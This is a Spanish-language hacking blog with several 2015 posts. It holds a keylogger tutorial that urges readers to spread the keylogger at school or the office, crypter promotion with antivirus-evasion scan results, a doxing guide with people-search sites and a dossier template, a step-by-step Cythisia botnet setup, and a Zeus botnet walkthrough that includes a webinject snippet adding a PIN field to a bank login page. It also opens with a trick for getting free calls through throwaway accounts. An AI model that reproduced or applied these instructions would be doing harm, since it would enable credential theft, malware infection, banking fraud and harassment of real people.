Después de que esté completamente instalado, amigo llama abierta desde el escritorio. Entonces registrarse. consultar el correo electrónico y verificar la cuenta de lo contrario no será capaz de llamar a pesar de que tiene créditos de libre configuración


Ahora disfrutar de su llamada. El temporizador se congelará. Puedes hablar todo lo que quieras. Cuando termine la llamada, usted será cargada solamente 0,02 pero después se termina su saldo, hacer una nueva cuenta y disfruta.
Puede escribir cualquier correo electrónico que desea. ASÍ PUES, LA CREACIÓN DE UNA NUEVA CUENTA no tomará TIEMPO !!

LLAMADAS GRATIS A TODO EL MUNDO 100%

lunes, 6 de julio de 2015

SYSLOGGER Keylogger Tutorial


Hola! En este pequeño tutorial voy a "hablar" acerca de bitácora del sistema de Keylogger. Voy a tratar de explicar todas las opciones del programa y todo el proceso.


VAMOS A EMPEZAR!


Por encima, podemos sí, lo primero que aparece, cuando abrimos bitácora del sistema. Sólo Pulse OK, para que podamos continuar


El programa se abrirá, y podemos ver muchas, muchas opciones. Vamos a hablar de ellos paso a paso.


Como podemos ver, en la esquina superior derecha, tenemos campos para llenar con nuestra información de correo electrónico. Sólo tienes que rellenar la derecha y pulse Test Mail.  Si llenar todo correctamente este cuadro se mostrará:


Si desea obtener los registros en un servidor FTP, simplemente llenarlo, y probarlo. Y usted es bueno ir! Ahora que se configura la forma de obtener los registros, permite configurar el servidor en sí


Así, en todos mis servidores puedo activar estas opciones:

Antis
Encrypt Mail
Delete Cookies
Block AV Sites
Kill Task Man
Clipboard Logger
Force Steam

Básicamente, lo que las opciones de arriba hace es: Bloquee el Administrador de tareas (Kill Tarea Man); Todo lo que se copia como CTRL + C obtener de los registros (Portapapeles Logger); Obliga al cliente para iniciar sesión en vapor (Fuerza de vapor); Elimina las cookies de su navegador (Eliminar cookies) ;. Hay más opciones que puede activar como Spread USB y puesta en marcha (Spread USB, es una extensión al insertar la unidad USB) (inicio es cuando se enciende el ordenador el keylogger se iniciará de forma automática), pero no me gusta para activarlos , son demasiado malo! : D  El error se activa es una pequeña ventana que se muestra cuando se abre la Keyloger. Puedes configurarlo para decir algo que desea.


Después de hacer todo esto simplemente haga clic en Generar servidor! : D


Ahora usted debe obtener su keylogger con éxito en la carpeta que elija para guardarlo.

Después de esto es sencillo, basta con difundirlo, en su escuela, oficina ....

Conclusion

Ahora creo que va a ser capaz de enviar un buen keylogger para cualquier persona que desee.

Download:

>>> [TUT] SYSLOGGER Keylogger Tutorial


 Please do not scan the server crypted on : VirusTotal/JottiMalware/Metascan/VirScan

Use the following scanners : Nodistribute.com | fuckingscan.me | scan.majyx.net | refud.me/scan.php |

viruscheckmate.com/free/

Scan of server darkcomet crypted with icon changed :

Result: (0/59)

A-Squared(Emisoft AntiMalware) Clean - Nothing Found
Agnitum Clean - Nothing Found
AhnLab V3 Internet Security Clean - Nothing Found
ArcaVir Clean - Nothing Found
Avast Clean - Nothing Found
Avg Clean - Nothing Found
Avira Clean - Nothing Found
Ad-Aware Clean - Nothing Found
Baidu AV Clean - Nothing Found
BitDefender Clean - Nothing Found
BKav Clean - Nothing Found
BullGuard Internet Security Clean - Nothing Found
ByteHero Clean - Nothing Found
ClamAv Clean - Nothing Found
Comodo Clean - Nothing Found
Dr. Web Clean - Nothing Found
eScan Clean - Nothing Found
eTrust-Vet Clean - Nothing Found
eScan Internet Security Suite 14 Clean - Nothing Found
ESET NOD32 Clean - Nothing Found
Fortinet Clean - Nothing Found
Fprot Clean - Nothing Found
FSB Antivirus Clean - Nothing Found
F-Secure Clean - Nothing Found
Gdata Clean - Nothing Found
Ikarus Clean - Nothing Found
Immunet Antivirus Clean - Nothing Found
IObit Malware Fighter Clean - Nothing Found
K7Ultimate Clean - Nothing Found
Kaspersky Internet Security 2015 Clean - Nothing Found
KingSoft Clean - Nothing Found
kts Clean - Nothing Found
Malwarebytes Anti-Malware Clean - Nothing Found
mcafee Clean - Nothing Found
Microsoft Security Essentials Clean - Nothing Found
nProtect Clean - Nothing Found
NANO Antivirus Clean - Nothing Found
Netgate Clean - Nothing Found
Norton Internet Security Clean - Nothing Found
Norman Clean - Nothing Found
Outpost Security Suite Pro Clean - Nothing Found
Ozone AV Clean - Nothing Found
Panda Antivirus Clean - Nothing Found
Panda Cloud Clean - Nothing Found
PC Tools Clean - Nothing Found
Quick Heal Clean - Nothing Found
SUPERAntiSpyware Clean - Nothing Found
Solo Clean - Nothing Found
Sophos Clean - Nothing Found
TotalDefense Clean - Nothing Found
Trendmicro Internet Security Clean - Nothing Found
TrustPort Antivirus 2014 Clean - Nothing Found
Unthreat AntiVirus BE Clean - Nothing Found
Vba 32 Clean - Nothing Found
Vexira Clean - Nothing Found
Vipre Internet Security 2014 Clean - Nothing Found
VirIT Clean - Nothing Found
Webroot Clean - Nothing Found
Zillya Clean - Nothing Found
Zoner Clean - Nothing Found
360 Clean - Nothing Found

Filename: ReFUDSampleFree.exe
File MD5 Hash: f74b352efb9ba9a95274e9be2e7ac489
File SHA1: 633649ed7980ee28f8236660d71a048b1347553e
File Size: 1470600 Bytes
Time Scanned: 24-06-15, 04:21:15
Scan provided by RazorScanner
Link to Scan: http://razorscanner.com/result.php?id=866401

Recommanded configuration for Cybergate :


Recommanded configuration for DarkComet :


To download free edition click here :


Password Archive RAR :

Decrypt the password good luck

w=JW3kl6zzstwx78gu7cJmLiz4wg0elhvWFO8z/Vyz/iXllRzdvoJk/ryAetEgwDD8FcfkPswxVGD8JvD8vGzz/Tndwg0elhD8FzqrLjyAJrfm3xy87v0SlrAk3kDSlL0m7ZyG55

Base64 < Tripo-5 < Atom-128 < HAZZ-15

[Free] ICryptex Free Edition [100% FUD] [Latest Update : 24/06/2015]

domingo, 5 de julio de 2015


Doxing (dox es una abreviacion de "documentos") es un proceso para obtener informacion personal de un objetivo siendo casi siempre una persona, en este tipo de documentos podemos obtener mucha documentacion sobre la persona tal como puede ser: nombre real, sexo, sitio web, alias, email, perfil de redes sociales, direccion, ip, etc. Este tipo de tecnicas entran dentro de la ingieneria social.

Hay muchas herramientas ya sea online o de escritorio las cuales te permiten automatizar este tipo de proceso, y la mejor forma de realizar esto es las conexiones que realices al buscar tu objetivo. Encontrar un nombre de usuario lleva a encontrar el nombre completo y esto puede conducir a la direccion fisica. El usuario puede llevar alguna fotografia lo cual puede resultar en dar su direccion o placas. Para nombres comunes como Cesar se le pueden agregar los intereses o localizacion para encontrar mas rapido lo buscado, es por esto tambien que muchas personas no confian en otras por internet debido a la informacion que se puede encontrar puede ser muchas veces un golpe bajo.

Otro tipo de ejemplo puede ser: http://cur.lv/nogc4

Obteniendo informacion de un objetivo

Aqui depende mas que nada del tipo de informacion que tengas con que empezar, ya sea el alias, el email, la direccion fisica, etc. Como comentabamos mas arriba un dox es una abreviacion de documento entonces por lo menos deberiamos tener el siguiente formato de documentacion el cual nos puede ser de utilidad:

Nombre de usuario/ Sobrenombre:
Nombre real:
Localizacion:
Nacionalidad:
Imagenes:
Videos:
Religion:
Orientacion Sexual:
Numero movil/telefono:
Direccion IP:
Sitios webs hackeados:
Paginas de redes sociales:
Foros en los que postea:
Miembros de su familia:
Ocupacion:
Registro criminal:
Informacion extra:
Por busqueda general usamos Google.

www.google.com

Podemos usar los famosos dorks para encontrar informacion, algunos ejemplos de utilidad pueden ser:

inurl: especificas el sitio donde deseas buscar a la persona.

alias inurl:www.elsitio.com
alias inurl:www.facebook.com

intitle: especifica que tenga en el titulo de cualquier pagina lo que le indiques.

alias intitle:bienvenido

intext: especficia que tenga en el cuerpo de la pagina lo que le indiques.

alias intext:juakear

Otro sitio de busqueda pueden ser:

www.bing.com
www.duckduckgo.com

Sitios webs recomendados para busqueda de informacion:

https://pipl.com
http://www.spokeo.com
http://www.peekyou.com
http://www.yasni.com
http://www.skipease.com
http://www.ussearch.com
http://freeality.com
http://www.zabasearch.com
http://www.keotag.com
http://yahoo.intelius.com
http://archive.org
https://www.facebook.com/directory/people
http://topsy.com
http://socialmention.com
http://knowem.com
http://twoogel.com
http://www.whostalkin.com
https://namechk.com
http://www.freecellphonedirectorylookup.com
http://www.numberway.com
http://www.fonefinder.net
http://publicrecords.onlinesearches.com
http://www.jailbase.com/en/sources/fl-lcso
http://exifdata.com
http://whois.domaintools.com
http://checkusernames.com

Ingieneria social

Como habiamos comentado arriba el proceso del doxing esta muy ligado a la ing. social por lo cual puedes agregar el email del usuario o en las redes sociales, para obtener los datos deseados, como dijo kevin mitnick:

* Todos queremos ayudar.
* El primer movimiento es siempre de confianza hacia el otro.
* No nos gusta decir No.
* A todos nos gusta que nos alaben.

Puedes comenzar desde ahi tus cimientos. Quizas te interese:

http://arthusu.blogspot.mx/2015/05/php-creando-una-firma-dinamica.html

Formas de defenderse

Las recomendaciones para defenderse son:

* Intenta cambiar tu nickname cierto tiempo
* Intenta usar canales seguros (Proxys, VPNS, TOR)
* Para chatear por canales seguros (http://arthusu.blogspot.mx/2014/03/conversaciones-privadas-usando-pidgin-y.html)
* Cifrar tus mensajes (https://foro.hackxcrack.net/criptografia-y-esteneografia/enviar-mensajes-cifrados-por-gmail-o-hotmail-by-arthusu/)

Como recomendacion haste un doxing a ti mismo, e intenta borrar todos los rastros que puedas encontrar.

* No dejar datos en redes sociales.
* Uso de correos temporales
* No usar datos reales
* No confiar (Esta no se aplica a todos, pero mucha gente que no sabes en cual confiar)


>>> Encontrar informacion de personas en Internet!

martes, 30 de junio de 2015

Cythisia v2 es un simple Botnet HTTP que incluye las características Botnet standart.

Cómo configurar Cythisia v2

1.En primer lugar de todos Descárgalo aquí (LINK)

2. Después de la descarga debe tener el archivo .rar. Extraer y que debería tener este aspecto:


3. Ahora usted necesita un servicio de hosting para subirlo. Si no allready tiene uno, yo sugeriría http://www.azok.org  Crear una cuenta allí con subdominio etc.

4. Una vez que su subdominio está listo, vaya a su panel de control.

5. En el panel de control van a Avanzado, luego en "Bases de datos MySQL".

6. Complete los datos requeridos.

7. Junto a "bases de datos mysql, debería ser la tarea" phpmyadmin ". Haga clic en él. Entonces no debería aparecer su base de datos creada. Haga clic en" entrar en phpmyadmin ".

8. Ahora estás en phpmyadmin. Ir a la importación, a continuación, busque a dump.sql, que usted puede encontrar en la carpeta "webpanel". Sube y su hacer.

9. Después de esto, vaya a "File Manager 1"

10. Ir a la carpeta html pública.

11. Haga clic en Cargar y busque el archivo "Webpanel.zip" (asegúrese de cargarlo en el lado derecho.)

12. Después de la carga exitosa, volver al Gestor de archivos, marque la carpeta webpanel y haga clic en "chmod"

13. chmod la carpeta a 777 y marque los dos campos a continuación.

14. Ok ahora usted subido los archivos. Ahora usted tiene que editar uno de los archivos con los datos de mysql, que se puede encontrar de nuevo en "bases de datos mysql" en el panel de control.

15. Ir a /Webpanel/admin/inc/config.php y haga clic en Editar.

16. Ahora verá el archivo php, tiene que editarlo con sus datos de base de datos mysql como yo

17. Diríjase al sitio web: http://www.yoursite.com/Webpanel/  Una pequeña caja con "password" debería aparecer. La contraseña por defecto es "admin". Para editar la edición contraseña el index.php que usted puede encontrar en /Webpanel/index.php

18. Inicio de sesión y su Panel debe tener este aspecto:

19. Ahora vamos a la parte constructor, abierta Cythbuilder.exe y editar los datos.

20. Obtener el builded.exe y la extendió.

21. Hecho

VIDEO:


[TUT] Cythisia Botnet Detailed Set Up

lunes, 29 de junio de 2015

Zeus Botnet Overview

Creación y configuración de Bot

El primer paso en la construcción de un ejecutable bot es editar el archivo de configuración. La configuración le dice al bot cómo conectarse a la red de bots, y también contiene información sobre los datos que los usuarios reunir y cómo hacerlo. El archivo de configuración está en dos partes, como se describe a continuación.

Configuración estática 
El StaticConfig se compila en el bot por la herramienta del constructor. Contiene información que necesitará el bot cuando se ejecuta primero. Para actualizar el StaticConfig los robots deben ser ordenados para descargar una nueva versión de bot.

Los ajustes disponibles son:
El nombre de la red de bots que este bot pertenece.
La cantidad de tiempo de espera entre descargas dinámicas de archivos de configuración.
El intervalo de tiempo entre cargas de registros y la información estadística con el servidor de gota.
La URL en la que el robot puede obtener el archivo de configuración dinámica.
Una URL donde el bot puede comprobar su propia dirección IP, para determinar si está detrás de un router o firewall.
La clave de cifrado que se utiliza para ocultar la información transmitida dentro de la botnet.
Una lista de ID de lenguaje que le dice al bot para entrar en un estado latente si el lenguaje de la computadora infectada está en la lista.

Configuración dinámica

El DynamicConfig se descarga por el bot, inmediatamente después de que se instala en el ordenador de la víctima.
Este archivo se descarga a intervalos de tiempo por el bot, y se puede utilizar para cambiar el comportamiento de la botnet.
La mayor parte de las entradas de control de cómo se recopila la información de la computadora infectada. Los valores disponibles son:

Una URL donde el bot puede descargar una nueva versión de sí mismo, si se da la orden de hacerlo.
La URL del servidor caída donde se subirán y se guardan registros, estadísticas y archivos.
La información utilizada para inyectar campos adicionales en las páginas web visitadas por el equipo infectado.
Una lista de direcciones URL en un archivo de configuración de copia de seguridad de emergencia se puede encontrar.
Un conjunto de máscaras de URL utilizados para causar o prevenir el registro de la información.
Un conjunto de máscaras de URL para indicar que una imagen de la pantalla debe ser salvado si se hace clic en el botón izquierdo del ratón.
Una lista de pares de direcciones URL que se utilizan para causar la redirección de la primera a la segunda URL.
Un conjunto de máscaras de URL utilizados para recoger TAN números (autenticación de transacciones) - utilizado por algunos bancos para la autenticación en línea.
Una lista de pares / URL IP que se insertan en los ejércitos de la computadora infectada archivo para anular las búsquedas de DNS.

Construyendo el Bot

Una vez que el archivo de configuración está lista la herramienta del constructor se utiliza para construir el archivo de configuración dinámica cifrado y el archivo ejecutable bot. El Constructor primero comprueba el equipo que se está ejecutando para comprobar si está instalado el bot Zeus y le da al usuario la opción de limpiar el sistema. Esta es, probablemente, la intención de hacer más fácil para poner a prueba los valores de configuración. El Constructor entonces reportar la información del sistema como se ve en la Figura 1 a continuación:


Figura 1: Zeus Builder - Información 
Utilizando el constructor, el maestro botnet aspirante puede hacer clic en el botón "Generar config" para compilar el archivo de configuración en su forma encriptada. También se proporciona una opción de editar aquí. Cuando este archivo está listo se coloca en el servidor donde los robots se les ha dicho a buscar la DynamicConfig. Distribuir el archivo de configuración de esta manera hace que sea fácil de actualizar la configuración en el futuro. La imagen siguiente muestra la salida del constructor después de la configuración se ha construido. Si se produce algún error durante la construcción se detalla aquí.


Figura 2: Zeus Builder - Compilación de configuración 
A continuación, haciendo clic en el botón "Generar loader", la forma distribuible del ejecutable bot puede montarse y se guarda. El botón se puede empujar varias veces para producir ejecutables bot internamente idénticos con cifrado diferente. Los tamaños de las secciones de archivos PE también se cambian en cada nueva generación. La imagen siguiente muestra la información mostrada por el constructor después de que el robot se ha construido.


Figura 3: Zeus Builder - Montaje y configuración binaria  Debido a las nuevas versiones de la misma configuración bot pueden ser fácilmente creados es bastante fácil para mantener la ampliación de la red de bots cuando el software anti-virus comienza a detectar las versiones anteriores.

Bot Distribución e Instalación

El bot Zeus no tiene capacidad incorporada para propagarse a otros ordenadores. En la mayoría de los casos una campaña de spam se utiliza para distribuirlo, ya sea como un archivo adjunto o un enlace. Algún tipo de ingeniería social en el mensaje de spam se utiliza para engañar a las víctimas para que ejecute el bot. Una amplia variedad de estos trucos se han visto, a menudo en formas que son persuasivo y difícil de detectar. El gran número de trucos de ingeniería social es el resultado de muchos individuos que intentan sembrar su propia botnet, utilizando la plataforma de Zeus común. La falta de capacidad de propagación de gusano hace que el robot adecuado para los ataques dirigidos, ya que el bot es menos visible y menos probable que se detecten. En los ataques dirigidos, puede ser enviado a la víctima en varios disfraces hasta que se logre el éxito.

Cuando el bot se ejecuta en el ordenador de la víctima pasa por una serie de pasos para instalar y configurar en sí, y para conectarse a la red de bots. Los nombres de archivo dan aquí son para la versión probada, ya veces se cambian en nuevas versiones. A continuación se describen las medidas adoptadas tras la ejecución inicial:

  1. Las búsquedas de función para instalar el proceso de "winlogon.exe", asigna algo de memoria dentro de ella y descifra a sí mismo en el proceso.
  2. El ejecutable bot se escribe en el disco duro como "C: WINDOWSsystem32sdra64.exe".
  3. Se crea: El directorio "WINDOWSsystem32lowsec C". Este directorio no es visible en el Explorador de Windows, pero se puede ver desde la línea de comandos. Su propósito es contener los siguientes archivos: local.ds: Contiene el archivo DynamicConfig más recientemente descargado. user.ds: Contiene información registrada. user.ds.lll: Temporalmente creado si falla la transmisión de registros al servidor gota.
  4. El valor de la clave de registro Winlogon ("HKLM / SOFTWARE / Microsoft / Windows NT / CurrentVersion / Winlogon") se adjunta con la ruta del ejecutable bot: C: /WINDOWS/system32/sdra64.exe. Esto hará que el robot que se ejecuta cuando se reinicia el equipo
  5. El firewall de Windows XP está desactivado. Esto hace que un icono de advertencia Centro de seguridad de Windows para que aparezca en la bandeja del sistema, la única indicación visible de que el ordenador ha sido infectado.
  6. El robot emite un comando "M-SEARCH" para encontrar los dispositivos de red UPnP. Esto puede ser un intento de acceder y configurar los routers locales.
  7. El bot envía un comando HTTP GET al servidor botnet configurado para obtener el archivo DynamicConfig tardar.
  8. El robot comienza la captura y registro de la información de la computadora infectada. El archivo DynamicConfig determina en gran medida lo que se recoge la información.
  9. El bot envía dos POST HTTP comandos para cargar registro (user.ds) y stat información al servidor gota botnet.
  10. Tres temporizadores se ajustan a los valores de la StaticConfig, cada ejecución de una función de tiempo de espera Tener nuevas fichero de configuración (DynamicConfig) del servidor (por defecto 60 minutos). Pon cosechado datos (user.ds) al servidor (por defecto 1 minuto). Pon a estadísticas del servidor (por defecto 20 minutos).
  11. Si una página web que se ve desde el ordenador infectado se encuentra en la lista de objetivos de la inyección en el DynamicConfig, los campos adicionales de la lista se inyectan en la página.
  12. Si el HTTP "200 OK" respuesta a un POST contiene un comando de script oculto, el robot ejecuta y devuelve una indicación de éxito o fracaso, junto con todos los datos (ver sección Comunicación abajo).
Mando y Control Botnet

Instalación del panel de control

La aplicación Panel de control Zeus se utiliza principalmente para realizar el seguimiento del estado de las botnets controladas y enviar comandos de guión para los bots. También proporciona una manera organizada para ver y acceder a la información recogida por los robots de los ordenadores infectados.
El Panel de Control es una aplicación PHP de código abierto que se puede ejecutar en un servidor IIS o Apache Web. Algunos programas de software adicional, la mayoría de los cuales se especifica en la documentación, también es necesario. Un usuario de MySQL con permisos adecuados también debe estar configurado. Cuando el sistema está listo el código panel de control se puede copiar en el directorio del servidor web. La página de instalación puede entonces acceder desde un navegador. Si se realizan los errores al rellenar este formulario, el usuario recibe un mensaje de ayuda. Una vez que se complete esta forma el resto de la configuración se realiza automáticamente.


Administración botnet 
Después de entrar en el Panel de control, se muestra la página inicial, como se muestra en la Figura 5 a continuación:

A la izquierda hay un menú donde se puede acceder a varias páginas. A la derecha es un resumen de la información sobre la red de bots. Tenga en cuenta que varias versiones del robot se pueden administrar con una versión del Panel de control. Si se hace clic en el elemento "OS" en el menú tenemos una lista de las versiones del sistema operativo en la red con un recuento de los robots para cada versión. El siguiente elemento del menú es "Motores de búsqueda", que muestra inicialmente la forma "Filtro". Aquí el usuario puede seleccionar "Inside NAT" o "Fuera de NAT", "en línea" o "fuera de línea", etc. filtrar solamente los bots más interesantes.


Al hacer clic en "Aceptar" resultados en una lista que muestra información básica sobre cada uno de los bots. El "ID Bot" es un identificador único generado automáticamente para el bot. El campo "Comentarios" muestra los comentarios que se han añadido por el usuario. La "acción Motores de búsqueda:" en el menú desplegable permite algo más de información que se obtiene, por ejemplo, los seleccionados "información completa" Resultados de la opción en los detalles que aparecen en la Figura 7. El usuario puede agregar comentarios aquí, y el campo "Usado" se puede ajustar. El propósito de estos parece ser la de permitir el filtrado más exclusivo de los robots que aparecen en la lista que se muestra arriba.


El siguiente punto del menú principal es "Scripts", que muestra una lista de secuencias de comandos que han sido creados por el usuario. Estos scripts se utilizan para enviar uno o más de los comandos integrados a los bots (ver Comunicaciones abajo).


Al hacer clic en "Agregar nuevo script" o en uno de los nombres de script hace que el diálogo de edición que se mostrará. Aquí el estado de la secuencia de comandos se puede establecer en "Enabled", por lo que se distribuirá la próxima vez que los robots de check in. El rango de distribución puede ser limitada a un bot o un botnet, o para los países mencionados. Esto es importante para los servicios basados en localización (LBS). En el campo de contexto una o más secuencias de comandos se pueden introducir.


Si el guión ha sido enviada a cualquiera de los bots, un cuadro de información muestra cada transmisión con éxito a un bot y si falló o fue ejecutado. Guiones mal formados fallan en el bot, no en el panel de control, que parece hacer muy poco corriente. Al hacer clic en el signo de interrogación al lado de "Contexto:" muestra una lista de comandos disponibles en la actualidad guión con explicaciones. Los comandos se pueden usar para recoger más información, para realizar cambios en la red de bots o para dar un mayor control de la computadora infectada.


Los "Informes:" sección del menú principal contiene dos opciones para el manejo de la información robada de ordenadores infectados. Información que no sea archivos se ponen en la base de datos MySQL, y se puede ver haciendo clic en la opción "Buscar en la base de datos". La siguiente imagen muestra el cuadro de diálogo de búsqueda y un poco de información que se ha encontrado.

Entre los primeros elementos de la lista se encuentran algunos con capturado información de acceso. Un ejemplo de los detalles de estas entradas contienen se puede ver en la figura 12. La segunda opción en los "Informes:" sección "Buscar en archivos". Aquí es donde los archivos que se envían de vuelta de los bots se pueden encontrar. Como de costumbre, se proporciona un diálogo de búsqueda, debido a que el número de archivos que viene de una gran botnet será muy alto.


Figura 13: Panel de control - Archivos de diálogo de búsqueda


Figura 14: Panel de control - Archivos Resultados de la búsqueda  La figura 13 muestra una búsqueda sin restricciones, con todos los archivos que han sido enviados por los robots y la estructura de directorios que se llevan a cabo. Hay un directorio principal para cada bot. Las capturas de pantalla se colocan en una carpeta "pantallas", bajo otra carpeta con el nombre con el URL que se está viendo cuando fueron capturados. Estas son las capturas de pantalla hechas cuando se hace clic en el botón izquierdo del ratón. Archivos de certificados que fueron capturados cuando se le dio el comando getcerts se encuentran en la carpeta "certs".
El autorun.inf archivo fue subido mediante el comando "getfile D: autorun.inf", por lo que se ha colocado dentro de una carpeta llamada "D:", en base a su trayectoria original. Al hacer clic en un nombre de archivo, cualquiera de los archivos se pueden descargar o ver.
Alternativamente, las casillas de verificación se puede hacer clic en los elementos que el usuario desea, y la opción "Crear archivo y descargar" se pueden elegir en "acción Files:".
En el marco del "Sistema:" sección del menú principal, el elemento "información" muestra algunos números de versión para la instalación del panel de control. El elemento "Opciones" permite cambios en algunas opciones de configuración, incluyendo la clave de cifrado botnet. Antes se cambia la clave de cifrado, los robots deben ser ordenados para descargar una nueva construcción bot con la nueva clave.


Figura 15: Panel de control - Opciones de sistema


Figura 16: Panel de control - Opciones de usuario 
La figura 16 muestra el elemento de "Usuario" en el menú principal, lo que permite de contraseña y de idioma cambios para el usuario principal. También hay una opción para cambiar el formato de las imágenes de pantalla. El panel de control ofrece un potente y fácil de usar interfaz gráfica de usuario para la botnet. Desde Zeus es un producto comercial, este tipo de característica tiene la ventaja de hacer más deseable a los posibles compradores, los compradores especialmente relativamente no técnicos.

Botnet Communications
Todas las comunicaciones botnet Zeus pasan entre los robots y uno o más servidores. Sólo se necesita un servidor físico, pero los adicionales se puede utilizar para distribuir actualizaciones de archivos de bots y archivos de configuración de repliegue.Los datos enviados a través de la botnet Zeus se cifran con el cifrado RC4. En esta implementación de un flujo de clave se genera a partir de la contraseña botnet, y es XOR con los datos. La misma contraseña se utiliza para cifrar todos los datos que se transmiten a través de la botnet. Cambio de la contraseña botnet requiere que todos los ejecutables bot actualizarse para una generación que incluye la nueva contraseña. El archivo de configuración dinámica también se debe actualizar y cambiar la contraseña del servidor desde el Panel de Control.Cuando un equipo está infectado con el bot Zeus, su primera comunicación con el servidor es una solicitud para el archivo de configuración dinámica. A diferencia de otros datos que se envían a través de la red, el archivo de configuración ya se ha cifrado por la aplicación Builder y puede ser enviado sin más trámite. La figura 17 muestra el archivo de configuración que se solicita por el bot, devuelto por el servidor de control.


Figura 17: El robot se pone el archivo de configuración dinámica 
Cuando se ha recibido el archivo de configuración, el robot va a recuperar la URL del servidor gota de ella. El bot luego POST HTTP alguna información básica sobre sí mismo al servidor gota, para iniciar sesión en e indicar que es en línea. Mientras se está ejecutando, el robot sigue HTTP Post encriptada registros y estadísticas al servidor a intervalos de tiempo. Por defecto los registros se envían a intervalos de 1 minuto y las estadísticas se envían cada 20 minutos.


Figura 18: El bot mensajes Información básica 
Cuando un bot mensajes de datos en el servidor, el servidor responde con un HTTP / 1.1 200 OK respuesta. El servidor Zeus esconde un mensaje cifrado como datos dentro de la respuesta. Este campo de datos se utiliza para enviar comandos (scripts) al bot. A continuación se muestra un ejemplo de los datos por defecto cuando no se envía ningún comando, que es el caso más común.


Figura 19: La respuesta del servidor para el POST contiene algunos datos
Cuando un guión de comando está siendo enviado por el servidor, el tamaño de los datos será considerablemente más grande que la respuesta estándar. La Figura 20 muestra un comando enviado getfile, resultando en 82 bytes de datos cifrados.

Figura 20: La respuesta del servidor para el POST contiene un comando

Web Page Injection

Una característica importante de la bot Zeus es su capacidad para inyectar dinámicamente dinámica en páginas web visitadas por un equipo infectado. Esto se hace en la marcha, como datos pasan desde el servidor al navegador del cliente. Un fragmento de los datos de configuración de este se muestra a continuación. Hace un buscar e insertar el funcionamiento bastante sencillo:

set_url http://www.bank.com/login.html GP
data_before
name="password"*</tr>
data_end
data_inject
<tr><td>PIN:</td><td><input type="text" name="pinnumber" id="pinnumber" /></td></tr>
data_end
data_after
data_end

El parámetro set_url identifica la página a ser atacado, data_before contiene el texto a buscar antes del punto de inyección y data_inject tiene el texto que se inyecta. La figura 21 muestra una página de acceso antes y después de la inyección.

Figura 21: Formulario de acceso antes y después de la inyección 

Se trata de un solo simple demostración. En la práctica engaños más elaborados se pueden crear, por ejemplo, los cambios inyectados podían pretender negar el acceso y pedir a las víctimas que confirmar su identidad mediante la cumplimentación de los campos adicionales. A continuación se muestra el código HTML antes de la inyección. El texto de búsqueda data_before se resalta.

<TR>
<TD>Username:</TD>
<TD><INPUT id=username name=username></TD></TR>
<TR>
<TD>Password:</TD>
<TD><INPUT type=password name=password></TD></TR>
<TR>
<TD colSpan=2><INPUT type=submit value=Submit></TD></TR>

La siguiente es la fuente HTML después de la inyección, con el código introducido desde el campo data_inject discutido anteriormente.

<TR>
<TD>Username:</TD>
<TD><INPUT id=username name=username></TD></TR>
<TR>
<TD>Password:</TD>
<TD><INPUT type=password name=password></TD></TR>
<TR>
<TD>PIN:</TD>
<TD><INPUT id=pinnumber name=pinnumber></TD></TR>
<TR>
<TD colSpan=2><INPUT type=submit value=Submit></TD></TR>

El archivo de configuración distribuida actualmente contiene ajustes por defecto para los ataques de inyección de más de 100 direcciones URL. Un ataque bien ejecutado puede ser muy difícil para una víctima de distinguir de una página web auténtica.





[TUT] Zeus Botnet

 
Khaleb MX © 2015 - Designed by Templateism.com